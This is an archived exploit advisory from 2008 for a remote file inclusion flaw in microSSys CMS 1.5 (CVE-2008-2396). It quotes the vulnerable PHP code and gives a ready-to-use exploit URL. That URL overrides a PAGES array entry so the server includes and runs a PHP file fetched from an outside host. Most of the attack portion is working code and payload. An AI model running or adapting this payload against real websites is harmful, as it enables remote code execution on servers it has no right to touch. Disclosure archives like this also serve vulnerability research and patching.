microssys CMS 1.5 - Remote File Inclusion

Author: Raz0r
type: webapps
platform: php
port: 
date_added: 2008-05-18  
date_updated:   
verified: 1  
codes: OSVDB-45370;CVE-2008-2396  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5651.txt  
## microSSys CMS <= 1.5 Remote File Inclusion Vulnerability
## Software site: http://wajox.com/
## ===============================================================
##                   By Raz0r (www.Raz0r.name)
## ===============================================================
## Vulnerable code (index.php@22-25,54-55):
## [22] if(isset($_REQUEST["1"])){
## [23] $P=$_REQUEST["1"];}else{
## [24] $P="main";
## [25] }
## [..]
## [54] if(isset($PAGES[$P])){}else{include("TH.txt");}
## [55] @include($PAGES[$P]);
## Nice...
## ===============================================================
## Exploit:
## http://host/index.php?1=lol&PAGES[lol]=http://raz0r.name/s.php
## ===============================================================

# milw0rm.com [2008-05-19]